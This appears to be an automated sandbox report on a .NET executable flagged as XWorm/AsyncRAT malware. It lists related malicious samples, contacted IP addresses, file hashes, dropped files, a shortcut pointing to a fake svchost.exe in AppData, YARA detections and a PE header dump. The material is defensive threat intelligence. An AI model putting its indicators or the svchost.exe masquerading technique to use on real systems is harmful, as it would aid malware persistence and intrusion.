                                                                                                    FACTURA9876567800.docx.docGet hashmaliciousLokibotBrowse
                                                                                                    • 87.120.113.235
                                                                                                    GT98765678000800.pif.exeGet hashmaliciousLokibotBrowse
                                                                                                    • 87.120.113.235
                                                                                                    POIUYTR0987000.bat.exeGet hashmaliciousLokibotBrowse
                                                                                                    • 87.120.113.235
                                                                                                    LGFH9876567800T..bat.exeGet hashmaliciousLokibotBrowse
                                                                                                    • 87.120.113.235
                                                                                                    mips.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 87.120.114.32
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    3b5074b1b5d032e5620f69f9f700ff0e20mktbose2.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                    • 149.154.167.220
                                                                                                    RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                    • 149.154.167.220
                                                                                                    y.batGet hashmaliciousBraodoBrowse
                                                                                                    • 149.154.167.220
                                                                                                    20bosemkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                    • 149.154.167.220
                                                                                                    OGo8AQxn4k.vbsGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    3o2WdGwcLF.vbsGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    https://amstoree.z13.web.core.windows.net/WinhelpSh0A057/index.html?Anph%5C=1-888-734-7204Get hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    New PO 796512.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                                                                    • 149.154.167.220
                                                                                                    https://spacardportal.works.com/garGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    No context
                                                                                                    Process:C:\Users\user\AppData\Local\svchost.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):654
                                                                                                    Entropy (8bit):5.380476433908377
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                    Malicious:false
                                                                                                    Preview:@...e...........................................................
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):41
                                                                                                    Entropy (8bit):3.7195394315431693
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                                                    MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                                                    SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                                                    SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                                                    SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                                                    Malicious:false
                                                                                                    Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):74240
                                                                                                    Entropy (8bit):5.9616079817725645
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:8C7dCCRXek2ycziKLGIp78eax9xbMxioyAgDd+E6V186Oc8E2el:p7MKOHXBGVpxbIEAgRA1dOcYel
                                                                                                    MD5:8D52069BD117DA94E0B0B70E73E33FB0
                                                                                                    SHA1:E8090ADDDFF167E1BDA4194AF968BA4BC22A2D60
                                                                                                    SHA-256:B3E217C467CFE1E8079E82B88F2F99950A9459330A8843070EBB34BF3E2BCF38
                                                                                                    SHA-512:7A91EEB0CF3EDB53D0AC3D51ABE85C97BB09DA5B334B387FDA90144A2F3729693367C451FEE9E04CB953DCF8D9D1B91EE12961BFE9F1E53C0AB06AABABD696ED
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\svchost.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\svchost.exe, Author: Joe Security
                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\svchost.exe, Author: ditekSHen
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g.?g............................N6... ...@....@.. ....................................@..................................5..W....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B................06......H.......|d..x.......&.....................................................(....*.r...p*. .3 .*..(....*.rG..p*. ..9.*.s.........s.........s.........s.........*.r...p*. .+.*.r...p*. .{..*.r...p*. E/..*.r"..p*. .+A.*.r...p*. S...*..((...*.r<..p*. .C..*.r...p*. ...*"(....+.*"(....+.*&("...&+.*.+5sc... .... .'..od...(,...~....-.(M...(?...~....oe...&.-.*.rn..p*. ....*.r...p*. ....*.r|..p*.r...p*. ....*.r...p*.r...p*. v...*.r...p*. ....*.r...p*..............j..................sf..
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 21 20:22:03 2024, mtime=Thu Nov 21 20:22:03 2024, atime=Thu Nov 21 20:22:03 2024, length=74240, window=hide
                                                                                                    Category:dropped
                                                                                                    Size (bytes):959
                                                                                                    Entropy (8bit):5.076055209297009
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:8g04x/B4WCyz7daJziRfBJ8FgdjAIfA/e13gUNwuLGhYA444t2YZ/elFlSJmZmV:8kHjZz7oziRQGZAIfA/eV7c/qyFm
                                                                                                    MD5:21589B93FCBC68574E1C59761DCF6586
                                                                                                    SHA1:814B4F0369BC6C1EC3715D3BC1F263EA53EBB258
                                                                                                    SHA-256:6DE69CF5AC0FD04D2904E272B46AE5AD984681268996F9C0764D199E565C619A
                                                                                                    SHA-512:B73782A25AF16310968E0706CEE68CB23783CE529D1861482492EDB549EB87750946B1C63382343978EE6EA7816641E06CC2AF303D5A7981988BE2EA0182A7EA
                                                                                                    Malicious:false
                                                                                                    Preview:L..................F.... ...B..i[<..B..i[<..B..i[<..."......................p.:..DG..Yr?.D..U..k0.&...&......vk.v.....".>[<...h.i[<......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^uY.............................%..A.p.p.D.a.t.a...B.P.1.....uY....Local.<......CW.^uY......b.........................L.o.c.a.l.....b.2.."..uY. .svchost.exe.H......uY.uY...............................s.v.c.h.o.s.t...e.x.e.......W...............-.......V...................C:\Users\user\AppData\Local\svchost.exe..#.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.s.v.c.h.o.s.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......045012...........hT..CrF.f4... .D...N....,.......hT..CrF.f4... .D...N....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):5.9616079817725645
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    File name:file.exe
                                                                                                    File size:74'240 bytes
                                                                                                    MD5:8d52069bd117da94e0b0b70e73e33fb0
                                                                                                    SHA1:e8090adddff167e1bda4194af968ba4bc22a2d60
                                                                                                    SHA256:b3e217c467cfe1e8079e82b88f2f99950a9459330a8843070ebb34bf3e2bcf38
                                                                                                    SHA512:7a91eeb0cf3edb53d0ac3d51abe85c97bb09da5b334b387fda90144a2f3729693367c451fee9e04cb953dcf8d9d1b91ee12961bfe9f1e53c0ab06aababd696ed
                                                                                                    SSDEEP:1536:8C7dCCRXek2ycziKLGIp78eax9xbMxioyAgDd+E6V186Oc8E2el:p7MKOHXBGVpxbIEAgRA1dOcYel
                                                                                                    TLSH:22737C1877E24529D5FF7FF509F13262DA79F2231903DA5F24D6058A2623ACACC80AF5
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g.?g............................N6... ...@....@.. ....................................@................................
                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                    Entrypoint:0x41364e
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x673F1F67 [Thu Nov 21 11:54:15 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
